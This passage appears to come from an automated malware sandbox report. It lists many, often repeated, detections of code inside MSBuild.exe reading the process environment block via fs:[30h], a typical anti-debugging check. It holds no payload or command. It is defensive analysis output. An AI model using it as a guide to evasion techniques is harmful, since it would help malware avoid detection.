Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h] 5_2_0144D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144D26B mov eax, dword ptr fs:[00000030h] 5_2_0144D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h] 5_2_013B7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B7208 mov eax, dword ptr fs:[00000030h] 5_2_013B7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 mov eax, dword ptr fs:[00000030h] 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h] 5_2_013C1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C1270 mov eax, dword ptr fs:[00000030h] 5_2_013C1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A9274 mov eax, dword ptr fs:[00000030h] 5_2_013A9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01384260 mov eax, dword ptr fs:[00000030h] 5_2_01384260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01384260 mov eax, dword ptr fs:[00000030h] 5_2_01384260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01384260 mov eax, dword ptr fs:[00000030h] 5_2_01384260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137826B mov eax, dword ptr fs:[00000030h] 5_2_0137826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01386259 mov eax, dword ptr fs:[00000030h] 5_2_01386259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455227 mov eax, dword ptr fs:[00000030h] 5_2_01455227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137A250 mov eax, dword ptr fs:[00000030h] 5_2_0137A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B724D mov eax, dword ptr fs:[00000030h] 5_2_013B724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379240 mov eax, dword ptr fs:[00000030h] 5_2_01379240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01379240 mov eax, dword ptr fs:[00000030h] 5_2_01379240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h] 5_2_013902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013902A0 mov eax, dword ptr fs:[00000030h] 5_2_013902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h] 5_2_013952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h] 5_2_013952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h] 5_2_013952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013952A0 mov eax, dword ptr fs:[00000030h] 5_2_013952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B329E mov eax, dword ptr fs:[00000030h] 5_2_013B329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B329E mov eax, dword ptr fs:[00000030h] 5_2_013B329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014552E2 mov eax, dword ptr fs:[00000030h] 5_2_014552E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED mov eax, dword ptr fs:[00000030h] 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F2F8 mov eax, dword ptr fs:[00000030h] 5_2_0143F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h] 5_2_013BE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE284 mov eax, dword ptr fs:[00000030h] 5_2_013BE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01400283 mov eax, dword ptr fs:[00000030h] 5_2_01400283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01400283 mov eax, dword ptr fs:[00000030h] 5_2_01400283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01400283 mov eax, dword ptr fs:[00000030h] 5_2_01400283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455283 mov eax, dword ptr fs:[00000030h] 5_2_01455283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013792FF mov eax, dword ptr fs:[00000030h] 5_2_013792FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h] 5_2_013902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h] 5_2_013902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013902E1 mov eax, dword ptr fs:[00000030h] 5_2_013902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h] 5_2_014172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014172A0 mov eax, dword ptr fs:[00000030h] 5_2_014172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov ecx, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014162A0 mov eax, dword ptr fs:[00000030h] 5_2_014162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h] 5_2_014492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h] 5_2_014492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h] 5_2_014492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014492A6 mov eax, dword ptr fs:[00000030h] 5_2_014492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0137B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0137B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B2D3 mov eax, dword ptr fs:[00000030h] 5_2_0137B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h] 5_2_013AF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF2D0 mov eax, dword ptr fs:[00000030h] 5_2_013AF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 mov eax, dword ptr fs:[00000030h] 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0138A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0138A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0138A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0138A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0138A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014092BC mov eax, dword ptr fs:[00000030h] 5_2_014092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014092BC mov eax, dword ptr fs:[00000030h] 5_2_014092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h] 5_2_014092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014092BC mov ecx, dword ptr fs:[00000030h] 5_2_014092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h] 5_2_013892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013892C5 mov eax, dword ptr fs:[00000030h] 5_2_013892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h] 5_2_013AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h] 5_2_013AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h] 5_2_013AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h] 5_2_013AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE53E mov eax, dword ptr fs:[00000030h] 5_2_013AE53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h] 5_2_013BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BD530 mov eax, dword ptr fs:[00000030h] 5_2_013BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 mov eax, dword ptr fs:[00000030h] 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138D534 mov eax, dword ptr fs:[00000030h] 5_2_0138D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B7505 mov eax, dword ptr fs:[00000030h] 5_2_013B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B7505 mov ecx, dword ptr fs:[00000030h] 5_2_013B7505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01454500 mov eax, dword ptr fs:[00000030h] 5_2_01454500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h] 5_2_013BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BB570 mov eax, dword ptr fs:[00000030h] 5_2_013BB570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B656A mov eax, dword ptr fs:[00000030h] 5_2_013B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B656A mov eax, dword ptr fs:[00000030h] 5_2_013B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B656A mov eax, dword ptr fs:[00000030h] 5_2_013B656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137B562 mov eax, dword ptr fs:[00000030h] 5_2_0137B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142F525 mov eax, dword ptr fs:[00000030h] 5_2_0142F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01388550 mov eax, dword ptr fs:[00000030h] 5_2_01388550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01388550 mov eax, dword ptr fs:[00000030h] 5_2_01388550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143B52F mov eax, dword ptr fs:[00000030h] 5_2_0143B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01455537 mov eax, dword ptr fs:[00000030h] 5_2_01455537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AF5B0 mov eax, dword ptr fs:[00000030h] 5_2_013AF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A45B1 mov eax, dword ptr fs:[00000030h] 5_2_013A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A45B1 mov eax, dword ptr fs:[00000030h] 5_2_013A45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014555C9 mov eax, dword ptr fs:[00000030h] 5_2_014555C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h] 5_2_014535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h] 5_2_014535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014535D7 mov eax, dword ptr fs:[00000030h] 5_2_014535D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h] 5_2_013A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h] 5_2_013A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h] 5_2_013A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h] 5_2_013A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15A9 mov eax, dword ptr fs:[00000030h] 5_2_013A15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE59C mov eax, dword ptr fs:[00000030h] 5_2_013BE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B4588 mov eax, dword ptr fs:[00000030h] 5_2_013B4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137758F mov eax, dword ptr fs:[00000030h] 5_2_0137758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137758F mov eax, dword ptr fs:[00000030h] 5_2_0137758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137758F mov eax, dword ptr fs:[00000030h] 5_2_0137758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01382582 mov eax, dword ptr fs:[00000030h] 5_2_01382582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01382582 mov ecx, dword ptr fs:[00000030h] 5_2_01382582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A15F4 mov eax, dword ptr fs:[00000030h] 5_2_013A15F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140B594 mov eax, dword ptr fs:[00000030h] 5_2_0140B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0140B594 mov eax, dword ptr fs:[00000030h] 5_2_0140B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BC5ED mov eax, dword ptr fs:[00000030h] 5_2_013BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BC5ED mov eax, dword ptr fs:[00000030h] 5_2_013BC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013825E0 mov eax, dword ptr fs:[00000030h] 5_2_013825E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
